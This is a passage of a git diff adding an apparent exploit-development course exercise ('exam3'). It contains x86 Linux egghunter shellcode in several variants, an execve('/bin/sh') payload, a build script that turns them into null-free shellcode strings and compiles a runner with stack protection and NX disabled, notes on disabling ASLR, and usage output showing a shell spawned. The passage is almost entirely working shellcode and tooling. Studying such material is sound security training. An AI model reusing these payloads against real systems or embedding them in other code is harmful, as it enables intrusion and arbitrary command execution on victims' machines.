+ld -m elf_i386 -o hunter hunter.o + +echo " [+] Extracting PAYLOAD code from payload ..." +PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s) + +echo " [+] Adding EGG mark to PAYLOAD ..." +FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g') + +echo " [+] Checking PAYLOAD code for NULLs ..." +if [[ $FULL_PAYLOADCODE == *00* ]]; then + echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting." + exit 1 +fi + + +echo " [+] Extracting HUNTER code from hunter ..." +HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g') + +# For debugging only +#echo ${DEFAULTEGG[0]} +#echo ${DEFAULTEGG[1]} +#echo ${NEWEGG[0]} +#echo ${NEWEGG[1]} + +# Preparing Default egg to HEX form in order to replace it with a New egg +DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') +DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') + +# Uncomment to save new EGGMARK in HEX format +NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') +NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') + +# Uncomment to save new EGGMARK in Plaintext format +#NEWEGG1=$(echo -n ${NEWEGG[0]}) +#NEWEGG2=$(echo -n ${NEWEGG[1]}) + + +FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g') + +echo " [+] Checking HUNTER code for NULLs ..." +if [[ $FULL_HUNTERCODE == *00* ]]; then + echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting." + exit 1 +fi + + +# Uncomment to see what will is replaced (default egg with a new one) +#echo $DEFEGG1 +#echo $DEFEGG2 +#echo $NEWEGG1 +#echo $NEWEGG2 +#echo $HUNTERCODE +#echo $FULL_HUNTERCODE + +cat > shellcode.c << EOF +#include +#include + +unsigned char hunter[] = \ +$FULL_HUNTERCODE; + +unsigned char garbage1[] = \ +"Just some garbage here..."; + +unsigned char payload[] = \ +$FULL_PAYLOADCODE; + +unsigned char garbage2[] = \ +"And some garbage there..."; + +main() +{ + printf("Hunter Length: %d\n", strlen(hunter)); + printf("Payload Length: %d\n", strlen(payload)); + int (*ret)() = (int(*)())hunter; + ret(); +} +EOF + +echo " [+] Compiling shellcode.c ..." +gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode + +# Cleanup +rm -f payload.o payload hunter.o hunter + +ls -la ./shellcode + +echo " [+] All done!" diff --git a/exam3/access-scasd/payload.nasm b/exam3/access-scasd/payload.nasm new file mode 100644 index 0000000..1ab23b8 --- /dev/null +++ b/exam3/access-scasd/payload.nasm @@ -0,0 +1,44 @@ +; This program is free software: you can redistribute it and/or modify +; it under the terms of the GNU General Public License as published by +; the Free Software Foundation, either version 3 of the License, or +; (at your option) any later version. +; +; This program is distributed in the hope that it will be useful, +; but WITHOUT ANY WARRANTY; without even the implied warranty of +; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +; GNU General Public License for more details. +; +; You should have received a copy of the GNU General Public License +; along with this program. If not, see . + +; Filename: payload-execve-stack.nasm +; Author: Andrey Arapov +; 2013 March + +global _start + + +section .text + +_start: + ; EAX + xor eax, eax + mov al, 11 ; execve syscall + + ; EBX + xor edx, edx + push edx ; NULL termination of '//bin/sh' string + push 0x68732f6e ; '//bin/sh' in reverse + push 0x69622f2f ; beginning of '//bin/sh' string is here + mov ebx, esp ; put the address of '//bin/sh' into ebx via esp + + ; ECX + push edx ; NULL termination of a stack + push ebx ; load our '//bin/sh' on a stack + mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string. + + ; EDX + push edx ; NULL terminator + mov edx, esp ; EDX is a PTR to a stack which has an address to NULL. + int 0x80 + diff --git a/exam3/access-scasd/shellcode.c b/exam3/access-scasd/shellcode.c new file mode 100644 index 0000000..e0102bc --- /dev/null +++ b/exam3/access-scasd/shellcode.c @@ -0,0 +1,18 @@ +#include +#include + +unsigned char hunter[] = "\xfc\x31\xd2\x66\x81\xca\xff\x0f\x42\x6a\x21\x58\x8d\x5a\x04\x31\xc9\xcd\x80\x3c\xf2\x74\xec\xb8\x48\x65\x72\x65\x89\xd7\xaf\x75\xe7\xb8\x49\x74\x49\x73\x8d\x7a\x04\xaf\x75\xdc\xff\xe7"; + +unsigned char garbage1[] = "Just some garbage here..."; + +unsigned char payload[] = "\x48\x65\x72\x65\x49\x74\x49\x73\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80"; + +unsigned char garbage2[] = "And some garbage there..."; + +main() +{ + printf("Hunter Length: %d\n", strlen(hunter)); + printf("Payload Length: %d\n", strlen(payload)); + int (*ret)() = (int(*)())hunter; + ret(); +} diff --git a/exam3/access/NOTES b/exam3/access/NOTES new file mode 100644 index 0000000..088dd00 --- /dev/null +++ b/exam3/access/NOTES @@ -0,0 +1,11 @@ +NOTES + + no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice + + execstack: disables Executable space protection (NX). + Or Data Execution Prevention (DEP) on Windows, + or Write XOR Execute (W^X) on BSD. + CPU’s NX bit ("Never eXecute"). + + To disalbe Address Space Layout Randomization (ASLR) when running binary + setarch `arch` -R ./program diff --git a/exam3/access/USAGE b/exam3/access/USAGE new file mode 100644 index 0000000..5fb491d --- /dev/null +++ b/exam3/access/USAGE @@ -0,0 +1,27 @@ +USAGE + +1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable) + + +2. Compile the shellcode with a custom "egg" (must be 8 bytes in length) + +access$ ./make.sh "MyEgg123" + [I] Using custom EGG mark: MyEgg123 + [+] Compiling payload.nasm ... + [+] Compiling hunter.nasm ... + [+] Extracting PAYLOAD code from payload ... + [+] Adding EGG mark to PAYLOAD ... + [+] Checking PAYLOAD code for NULLs ... + [+] Extracting HUNTER code from hunter ... + [+] Checking HUNTER code for NULLs ... + [+] Compiling shellcode.c ... +-rwx------. 1 arno arno 5132 Mar 28 00:22 ./shellcode + [+] All done! + + +3. Run the shellcode + +access$ ./shellcode +Hunter Length: 44 +Payload Length: 36 +sh-4.1$ diff --git a/exam3/access/hunter.nasm b/exam3/access/hunter.nasm new file mode 100644 index 0000000..cd9c50d --- /dev/null +++ b/exam3/access/hunter.nasm @@ -0,0 +1,59 @@ +; This program is free software: you can redistribute it and/or modify +; it under the terms of the GNU General Public License as published by +; the Free Software Foundation, either version 3 of the License, or +; (at your option) any later version. +; +; This program is distributed in the hope that it will be useful, +; but WITHOUT ANY WARRANTY; without even the implied warranty of +; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +; GNU General Public License for more details. +; +; You should have received a copy of the GNU General Public License +; along with this program. If not, see . +; +; +; Filename: hunter.nasm *access modification +; Author: Andrey Arapov +; 2013 March +; +; + +section .data + egg1 equ "Egg-" ; DWORD Egg marker part1 + egg2 equ "Mark" ; DWORD Egg marker part2 + + +section .text +global _start + + +_start: + xor edx, edx ; Searching the whole memory + + + ; We will scan memory page-by-page and only accessible pages will be scanned for the Egg marker +nextPage: + or dx, 0xfff ; The same as "add dx, 4095" (PAGE_SIZE) + +nextAddr: + inc edx ; Searching forward + + ; Checking if memory is accessible + push byte +0x21 ; 0x21 = 33 = __NR_access + pop eax ; EAX points to 0x21 + lea ebx, [edx+0x8] ; next address to check + xor ecx, ecx ; 0: mode = F_OK + int 0x80 + cmp al, -14 ; -14 = EFAULT = Bad address. See /usr/include/asm-generic/errno-base.h + jz nextPage + + + ; Searching for the Egg marker (in current page of memory which is accessible) + cmp dword [edx], egg1 + jne nextAddr + cmp dword [edx+0x4], egg2 + jne nextAddr + + lea ecx, [edx+0x8] + jmp ecx + diff --git a/exam3/access/make.sh b/exam3/access/make.sh new file mode 100755 index 0000000..00c5f73 --- /dev/null +++ b/exam3/access/make.sh @@ -0,0 +1,130 @@ +#!/usr/bin/env sh +# +# USAGE +# ./make.sh [Egg-Mark] +# +# NOTE +# Egg-Mark must be a plaintext with 8 bytes in length +# If Egg-Mark was not specified, the default one will be used. +# +# To specify a custom payload, simply modify the code of payload.nasm file. +# Alternativly, you can modify PAYLOADCODE= variable down below the code. +# + +ARG1=$1 + +if [ -z "$ARG1" ]; then + echo " [I] Argument not specified. Using default EGG mark." + ARG1="Egg-Mark"; +elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then + echo " [E] Custom EGG mark must be 8 bytes in length! Exiting." + exit 1; +else + echo " [I] Using custom EGG mark: "$ARG1 +fi + + +DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g')) # set in hunter.nasm +EGGMARK=$ARG1 +NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g')) + +# Uncomment to save EGGMARK in HEX +EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g') + +# Cleanup +rm -f shellcode payload.o payload hunter.o hunter + +echo " [+] Compiling payload.nasm ..." +nasm -f elf32 -o payload.o payload.nasm +ld -m elf_i386 -o payload payload.o + +echo " [+] Compiling hunter.nasm ..." +nasm -f elf32 -o hunter.o hunter.nasm +ld -m elf_i386 -o hunter hunter.o + +echo " [+] Extracting PAYLOAD code from payload ..." +PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s) + +echo " [+] Adding EGG mark to PAYLOAD ..." +FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g') + +echo " [+] Checking PAYLOAD code for NULLs ..." +if [[ $FULL_PAYLOADCODE == *00* ]]; then + echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting." + exit 1 +fi + + +echo " [+] Extracting HUNTER code from hunter ..." +HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g') + +# For debugging only +#echo ${DEFAULTEGG[0]} +#echo ${DEFAULTEGG[1]} +#echo ${NEWEGG[0]} +#echo ${NEWEGG[1]} + +# Preparing Default egg to HEX form in order to replace it with a New egg +DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') +DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') + +# Uncomment to save new EGGMARK in HEX format +NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') +NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') + +# Uncomment to save new EGGMARK in Plaintext format +#NEWEGG1=$(echo -n ${NEWEGG[0]}) +#NEWEGG2=$(echo -n ${NEWEGG[1]}) + + +FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g') + +echo " [+] Checking HUNTER code for NULLs ..." +if [[ $FULL_HUNTERCODE == *00* ]]; then + echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting." + exit 1 +fi + + +# Uncomment to see what will is replaced (default egg with a new one) +#echo $DEFEGG1 +#echo $DEFEGG2 +#echo $NEWEGG1 +#echo $NEWEGG2 +#echo $HUNTERCODE +#echo $FULL_HUNTERCODE + +cat > shellcode.c << EOF +#include +#include + +unsigned char hunter[] = \ +$FULL_HUNTERCODE; + +unsigned char garbage1[] = \ +"Just some garbage here..."; + +unsigned char payload[] = \ +$FULL_PAYLOADCODE; + +unsigned char garbage2[] = \ +"And some garbage there..."; + +main() +{ + printf("Hunter Length: %d\n", strlen(hunter)); + printf("Payload Length: %d\n", strlen(payload)); + int (*ret)() = (int(*)())hunter; + ret(); +} +EOF + +echo " [+] Compiling shellcode.c ..." +gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode + +# Cleanup +rm -f payload.o payload hunter.o hunter + +ls -la ./shellcode + +echo " [+] All done!" diff --git a/exam3/access/payload.nasm b/exam3/access/payload.nasm new file mode 100644 index 0000000..1ab23b8 --- /dev/null +++ b/exam3/access/payload.nasm @@ -0,0 +1,44 @@ +; This program is free software: you can redistribute it and/or modify +; it under the terms of the GNU General Public License as published by +; the Free Software Foundation, either version 3 of the License, or +; (at your option) any later version. +; +; This program is distributed in the hope that it will be useful, +; but WITHOUT ANY WARRANTY; without even the implied warranty of +; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +; GNU General Public License for more details. +; +; You should have received a copy of the GNU General Public License +; along with this program. If not, see . + +; Filename: payload-execve-stack.nasm +; Author: Andrey Arapov +; 2013 March + +global _start + + +section .text + +_start: + ; EAX + xor eax, eax + mov al, 11 ; execve syscall + + ; EBX + xor edx, edx + push edx ; NULL termination of '//bin/sh' string + push 0x68732f6e ; '//bin/sh' in reverse + push 0x69622f2f ; beginning of '//bin/sh' string is here + mov ebx, esp ; put the address of '//bin/sh' into ebx via esp + + ; ECX + push edx ; NULL termination of a stack + push ebx ; load our '//bin/sh' on a stack + mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string. + + ; EDX + push edx ; NULL terminator + mov edx, esp ; EDX is a PTR to a stack which has an address to NULL. + int 0x80 + diff --git a/exam3/access/shellcode.c b/exam3/access/shellcode.c new file mode 100644 index 0000000..de0a7a1 --- /dev/null +++ b/exam3/access/shellcode.c @@ -0,0 +1,18 @@ +#include +#include + +unsigned char hunter[] = "\x31\xd2\x66\x81\xca\xff\x0f\x42\x6a\x21\x58\x8d\x5a\x08\x31\xc9\xcd\x80\x3c\xf2\x74\xec\x81\x3a\x48\x65\x72\x65\x75\xe9\x81\x7a\x04\x49\x74\x49\x73\x75\xe0\x8d\x4a\x08\xff\xe1"; + +unsigned char garbage1[] = "Just some garbage here..."; + +unsigned char payload[] = "\x48\x65\x72\x65\x49\x74\x49\x73\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80"; + +unsigned char garbage2[] = "And some garbage there..."; + +main() +{ + printf("Hunter Length: %d\n", strlen(hunter)); + printf("Payload Length: %d\n", strlen(payload)); + int (*ret)() = (int(*)())hunter; + ret(); +} diff --git a/exam3/basic/NOTES b/exam3/basic/NOTES new file mode 100644 index 0000000..088dd00 --- /dev/null +++ b/exam3/basic/NOTES @@ -0,0 +1,11 @@ +NOTES + + no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice + + execstack: disables Executable space protection (NX). + Or Data Execution Prevention (DEP) on Windows, + or Write XOR Execute (W^X) on BSD. + CPU’s NX bit ("Never eXecute"). + + To disalbe Address Space Layout Randomization (ASLR) when running binary + setarch `arch` -R ./program diff --git a/exam3/basic/USAGE b/exam3/basic/USAGE new file mode 100644 index 0000000..f70903e --- /dev/null +++ b/exam3/basic/USAGE @@ -0,0 +1,27 @@ +USAGE + +1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable) + + +2. Compile the shellcode with a custom "egg" (must be 8 bytes in length) + +basic$ ./make.sh "egg.MaRk" + [I] Using custom EGG mark: egg.MaRk + [+] Compiling payload.nasm ... + [+] Compiling hunter.nasm ... + [+] Extracting PAYLOAD code from payload ... + [+] Adding EGG mark to PAYLOAD ... + [+] Checking PAYLOAD code for NULLs ... + [+] Extracting HUNTER code from hunter ... + [+] Checking HUNTER code for NULLs ... + [+] Compiling shellcode.c ... +-rwx------. 1 arno arno 5100 Mar 28 13:17 ./shellcode + [+] All done! + + +3. Run the shellcode + +basic$ ./shellcode +Hunter Length: 21 +Payload Length: 36 +sh-4.1$ exit diff --git a/exam3/basic/hunter.nasm b/exam3/basic/hunter.nasm new file mode 100644 index 0000000..da46f05 --- /dev/null +++ b/exam3/basic/hunter.nasm @@ -0,0 +1,40 @@ +; This program is free software: you can redistribute it and/or modify +; it under the terms of the GNU General Public License as published by +; the Free Software Foundation, either version 3 of the License, or +; (at your option) any later version. +; +; This program is distributed in the hope that it will be useful, +; but WITHOUT ANY WARRANTY; without even the implied warranty of +; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +; GNU General Public License for more details. +; +; You should have received a copy of the GNU General Public License +; along with this program. If not, see . +; +; +; Filename: hunter.nasm +; Author: Andrey Arapov +; 2013 March +; +; + +section .data + egg1 equ "Egg-" ; DWORD Egg marker part1 + egg2 equ "Mark" ; DWORD Egg marker part2 + + +section .text +global _start + + +_start: + ; Searching for the Egg marker +next: + inc eax ; Searching forward (can also try dec eax) +isEgg: + cmp dword [eax-8], egg1 ; Checking if we can see egg1 + jne next ; If not, continuing to search + cmp dword [eax-4], egg2 + jne next + + call eax ; Once found, we call our payload diff --git a/exam3/basic/make.sh b/exam3/basic/make.sh new file mode 100755 index 0000000..00c5f73 --- /dev/null +++ b/exam3/basic/make.sh @@ -0,0 +1,130 @@ +#!/usr/bin/env sh +# +# USAGE +# ./make.sh [Egg-Mark] +# +# NOTE +# Egg-Mark must be a plaintext with 8 bytes in length +# If Egg-Mark was not specified, the default one will be used. +# +# To specify a custom payload, simply modify the code of payload.nasm file. +# Alternativly, you can modify PAYLOADCODE= variable down below the code. +# + +ARG1=$1 + +if [ -z "$ARG1" ]; then + echo " [I] Argument not specified. Using default EGG mark." + ARG1="Egg-Mark"; +elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then + echo " [E] Custom EGG mark must be 8 bytes in length! Exiting." + exit 1; +else + echo " [I] Using custom EGG mark: "$ARG1 +fi + + +DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g')) # set in hunter.nasm +EGGMARK=$ARG1 +NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g')) + +# Uncomment to save EGGMARK in HEX +EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g') + +# Cleanup +rm -f shellcode payload.o payload hunter.o hunter + +echo " [+] Compiling payload.nasm ..." +nasm -f elf32 -o payload.o payload.nasm +ld -m elf_i386 -o payload payload.o + +echo " [+] Compiling hunter.nasm ..." +nasm -f elf32 -o hunter.o hunter.nasm +ld -m elf_i386 -o hunter hunter.o + +echo " [+] Extracting PAYLOAD code from payload ..." +PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s) + +echo " [+] Adding EGG mark to PAYLOAD ..." +FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g') + +echo " [+] Checking PAYLOAD code for NULLs ..." +if [[ $FULL_PAYLOADCODE == *00* ]]; then + echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting." + exit 1 +fi + + +echo " [+] Extracting HUNTER code from hunter ..." +HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g') + +# For debugging only +#echo ${DEFAULTEGG[0]} +#echo ${DEFAULTEGG[1]} +#echo ${NEWEGG[0]} +#echo ${NEWEGG[1]} + +# Preparing Default egg to HEX form in order to replace it with a New egg +DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') +DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') + +# Uncomment to save new EGGMARK in HEX format +NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') +NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') + +# Uncomment to save new EGGMARK in Plaintext format +#NEWEGG1=$(echo -n ${NEWEGG[0]}) +#NEWEGG2=$(echo -n ${NEWEGG[1]}) + + +FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g') + +echo " [+] Checking HUNTER code for NULLs ..." +if [[ $FULL_HUNTERCODE == *00* ]]; then + echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting." + exit 1 +fi + + +# Uncomment to see what will is replaced (default egg with a new one) +#echo $DEFEGG1 +#echo $DEFEGG2 +#echo $NEWEGG1 +#echo $NEWEGG2 +#echo $HUNTERCODE +#echo $FULL_HUNTERCODE + +cat > shellcode.c << EOF +#include +#include + +unsigned char hunter[] = \ +$FULL_HUNTERCODE; + +unsigned char garbage1[] = \ +"Just some garbage here..."; + +unsigned char payload[] = \ +$FULL_PAYLOADCODE; + +unsigned char garbage2[] = \ +"And some garbage there..."; + +main() +{ + printf("Hunter Length: %d\n", strlen(hunter)); + printf("Payload Length: %d\n", strlen(payload)); + int (*ret)() = (int(*)())hunter; + ret(); +} +EOF + +echo " [+] Compiling shellcode.c ..." +gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode + +# Cleanup +rm -f payload.o payload hunter.o hunter + +ls -la ./shellcode + +echo " [+] All done!" diff --git a/exam3/basic/payload.nasm b/exam3/basic/payload.nasm new file mode 100644 index 0000000..1ab23b8 --- /dev/null +++ b/exam3/basic/payload.nasm @@ -0,0 +1,44 @@ +; This program is free software: you can redistribute it and/or modify +; it under the terms of the GNU General Public License as published by +; the Free Software Foundation, either version 3 of the License, or +; (at your option) any later version. +; +; This program is distributed in the hope that it will be useful, +; but WITHOUT ANY WARRANTY; without even the implied warranty of +; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +; GNU General Public License for more details. +; +; You should have received a copy of the GNU General Public License +; along with this program. If not, see . + +; Filename: payload-execve-stack.nasm +; Author: Andrey Arapov +; 2013 March + +global _start + + +section .text + +_start: + ; EAX + xor eax, eax + mov al, 11 ; execve syscall + + ; EBX + xor edx, edx + push edx ; NULL termination of '//bin/sh' string + push 0x68732f6e ; '//bin/sh' in reverse + push 0x69622f2f ; beginning of '//bin/sh' string is here + mov ebx, esp ; put the address of '//bin/sh' into ebx via esp + + ; ECX + push edx ; NULL termination of a stack + push ebx ; load our '//bin/sh' on a stack + mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string. + + ; EDX + push edx ; NULL terminator + mov edx, esp ; EDX is a PTR to a stack which has an address to NULL. + int 0x80 + diff --git a/exam3/basic/shellcode b/exam3/basic/shellcode new file mode 100755 index 0000000000000000000000000000000000000000..bb8215c044c161344c933136879a715d4a647ba9 GIT binary patch literal 5100 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 literal 0 HcmV?d00001 diff --git a/exam3/basic/shellcode.c b/exam3/basic/shellcode.c new file mode 100644 index 0000000..feaf2d7 --- /dev/null +++ b/exam3/basic/shellcode.c @@ -0,0 +1,18 @@ +#include +#include + +unsigned char hunter[] = "\x40\x81\x78\xf8\x65\x67\x67\x2e\x75\xf6\x81\x78\xfc\x4d\x61\x52\x6b\x75\xed\xff\xd0"; + +unsigned char garbage1[] = "Just some garbage here..."; + +unsigned char payload[] = "\x65\x67\x67\x2e\x4d\x61\x52\x6b\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80"; + +unsigned char garbage2[] = "And some garbage there..."; + +main() +{ + printf("Hunter Length: %d\n", strlen(hunter)); + printf("Payload Length: %d\n", strlen(payload)); + int (*ret)() = (int(*)())hunter; + ret(); +}